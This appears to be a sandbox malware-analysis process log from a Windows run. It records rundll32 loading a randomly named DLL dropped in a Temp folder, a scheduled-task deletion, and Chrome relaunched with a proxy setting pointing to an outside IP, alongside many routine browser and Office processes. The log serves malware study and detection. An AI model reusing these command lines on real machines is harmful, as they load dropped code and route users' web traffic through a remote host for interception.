C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QomKEDtaZauBMonw\DQXkPdjL\WDpvYLh.dll",#1 /bKsite_idoTM 525403
1⤵
PID:1776

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QomKEDtaZauBMonw\DQXkPdjL\WDpvYLh.dll",#1 /bKsite_idoTM 525403
2⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:3756

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "xxPoWeVRQBzFwCLPV"
3⤵
PID:728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff799eab58,0x7fff799eab68,0x7fff799eab78
2⤵
PID:5532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1528 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:2
2⤵
PID:3832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:8
2⤵
PID:1636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2172 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:8
2⤵
PID:1676

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3340 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:1
2⤵
PID:3192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3684 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:1
2⤵
PID:5956

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3692 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:1
2⤵
PID:3776

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4008 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:1
2⤵
PID:1400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4492 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:1
2⤵
PID:3560

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4024 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:8
2⤵
PID:556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4724 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:8
2⤵
PID:6012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4788 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:8
2⤵
PID:5988

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5072 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:8
2⤵
PID:1800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5128 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:8
2⤵
PID:772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5648 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:1
2⤵
PID:3384

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5772 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:1
2⤵
PID:4436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3952 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:1
2⤵
PID:5960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=3984 --field-trial-handle=1812,i,11745377254931706002,18315315099745252854,131072 /prefetch:1
2⤵
PID:3680

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --proxy-server="94.103.91.33:3333"
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:1052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff799eab58,0x7fff799eab68,0x7fff799eab78
2⤵
PID:3876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1528 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:2
2⤵
PID:5284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --proxy-server=94.103.91.33:3333 --mojo-platform-channel-handle=1808 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:8
2⤵
PID:5932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --proxy-server=94.103.91.33:3333 --mojo-platform-channel-handle=2064 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:8
2⤵
PID:1536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3032 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:5808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3180 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3820 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:1972

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2832 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:2200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --proxy-server=94.103.91.33:3333 --mojo-platform-channel-handle=4784 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:8
2⤵
PID:1776

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --proxy-server=94.103.91.33:3333 --mojo-platform-channel-handle=4836 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:8
2⤵
PID:5676

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4976 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:2604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=6016 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:2860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5144 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:2696

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5920 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:3200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5888 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5836 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:6068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=1728 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:4400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --proxy-server=94.103.91.33:3333 --mojo-platform-channel-handle=5680 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:8
2⤵
PID:4020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4092 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:2024

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4172 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:5340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4160 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:2
2⤵
PID:4816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3252 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:5052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4080 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5840 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:3048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=4124 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:1532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=4572 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:1208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=3108 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:6056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=3176 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:2856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5076 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:4808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=3012 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:1008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=4704 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:5924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=5852 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:1768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=5812 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:5288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=3212 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=5208 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:6160

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=5616 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:6196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=4976 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:4512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=5196 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:6932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=3240 --field-trial-handle=1748,i,9382510711669508640,9948434908926980937,131072 /prefetch:1
2⤵
PID:5392

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3812

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\ResizeFind.avi"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5500

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Desktop\GroupHide.pptm" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:1060

C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1420

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:6280

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3416

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3416.0.582637821\2144665314" -parentBuildID 20230214051806 -prefsHandle 1692 -prefMapHandle 1540 -prefsLen 22338 -prefMapSize 235269 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ad22b8b-d2ca-45ec-9fb7-a239f13f7707} 3416 "\\.\pipe\gecko-crash-server-pipe.3416" 1800 256abd89b58 gpu
3⤵
PID:6544

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3416.1.125995734\1389550902" -parentBuildID 20230214051806 -prefsHandle 2296 -prefMapHandle 2292 -prefsLen 22374 -prefMapSize 235269 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5da2c3f2-6836-4d2d-9003-be9f5efd1576} 3416 "\\.\pipe\gecko-crash-server-pipe.3416" 2324 2569fa8a558 socket
3⤵
- Checks processor information in registry
PID:6760

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3416.2.1298020529\856512119" -childID 1 -isForBrowser -prefsHandle 2724 -prefMapHandle 1348 -prefsLen 22412 -prefMapSize 235269 -jsInitHandle 1320 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {88a70e22-a6f3-48f5-b5b2-5a4c69cf40df} 3416 "\\.\pipe\gecko-crash-server-pipe.3416" 2828 256af8b0558 tab
3⤵
PID:5036

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3416.3.1543296709\1341120416" -childID 2 -isForBrowser -prefsHandle 3952 -prefMapHandle 3948 -prefsLen 27830 -prefMapSize 235269 -jsInitHandle 1320 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0287f0e4-b169-4ccb-9e52-68e5f55d690d} 3416 "\\.\pipe\gecko-crash-server-pipe.3416" 3964 256b3d3ba58 tab
3⤵
PID:6344

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3416.4.953774727\772318069" -childID 3 -isForBrowser -prefsHandle 4884 -prefMapHandle 4948 -prefsLen 27987 -prefMapSize 235269 -jsInitHandle 1320 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7efcd581-eee4-4986-81da-981c165e1329} 3416 "\\.\pipe\gecko-crash-server-pipe.3416" 4956 256ade1b858 tab
3⤵
PID:6312

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3416.5.311977524\1171356416" -childID 4 -isForBrowser -prefsHandle 4968 -prefMapHandle 4880 -prefsLen 27987 -prefMapSize 235269 -jsInitHandle 1320 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {61c713ec-eced-46d1-9a8e-84e9f9421a62} 3416 "\\.\pipe\gecko-crash-server-pipe.3416" 4944 256ade1c158 tab
3⤵
PID:572

C:\Program Files\Mozilla Firefox\firefox.exe
